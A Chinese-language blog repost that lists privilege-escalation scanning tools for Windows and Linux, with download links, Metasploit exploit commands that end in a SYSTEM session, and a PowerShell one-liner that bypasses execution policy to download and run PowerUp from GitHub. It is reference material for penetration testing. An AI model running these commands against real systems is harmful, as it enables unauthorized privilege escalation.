Windows/Linux下常用的提权扫描辅助工具总结

请点击上面 Windows/Linux下常用的提权扫描辅助工具总结 一键关注!

文章参考来自Leticia’s blog的博客内容以及Github

使用Windows-Exploit-Suggester解析systeminfo

下载地址:https://github.com/AonCyberLabs/Windows-Exploit-Suggester

./windows-exploit-suggester.py

使用Linux-Exploit-Suggester.sh寻找linux提权问题

下载地址:https://github.com/mzet-/linux-exploit-suggester

./linux-exploit-suggester.sh

使用Sherlock工具

下载地址:https://github.com/rasta-mouse/Sherlock

Import-Module Sherlock.ps1
Find-AllVulns

使用MSF查询补丁和可利用提权漏洞

#查询补丁

meterpreter> run post/windows/gather/enum_patches 
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010

#查询Exp

msf> use post/multi/recon/local_exploit_suggester 
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run

# 利用示例

msf> use exploit/windows/local/cve_2019_1458_wizardopium 
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITYSYSTEM

使用powerup检查提权漏洞

powershell.exe -exec bypass -Command "& {Import-Module .PowerUp.ps1; Invoke-AllChecks}"
powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

使用accesschk.exe对系统扫描发现高权限可执行程序,且能够被低权限用户更改

accesschk "d:dir"
查看所有用户在d盘dir路径的子路径的权限

accesschk "Administrator "d:dir"
查看Administrator用户在d盘dir路径的子路径的权限

accesschk Administrators -c *
查看Administrators组对所有服务的权限

accesschk -k Guest hklmsoftware
查看Guest用户对hklmsoftware注册表的权限

accesschk -ou User
查看User用户对全局对象的权限

查找主机上具有的CVE,查找具有公开EXP的CVE的Python脚本

下载地址:https://github.com/chroblert/WindowsVulnScan

.KBCollect.ps1
python3 -m pip install requirements.txt
cve-check.py -u

查看具有公开EXP的CVE
cve-check.py -C -f KB.json

在线提权漏洞检测平台

极光无限出品的安全扫描仪,在提权方面,基于其强大的安全检测能力,能够给出专业的修复建议,有效验证和加固网络资产漏洞。

查询地址:https://detect.secwx.com/

提权辅助网页

在Windows提权的时候,对比补丁找Exp很烦吧?这个网站数据源每周更新一次,值得推荐

查询地址:http://bugs.hacking8.com/tiquan/
Windows/Linux下常用的提权扫描辅助工具总结


版权申明:内容来源网络,版权归原创者所有。除非无法确认,我们都会标明作者及出处,如有侵权烦请告知,我们会立即删除并表示歉意。谢谢!


本篇文章来源于微信公众号:网络安全与黑客技术

原创文章,作者:software,如若转载,请注明出处:https://www.sldh123.com/2723.html

(0)
上一篇 7月 9, 2022 6:00 上午
下一篇 7月 10, 2022 9:31 上午

相关推荐

发表回复

您的电子邮箱地址不会被公开。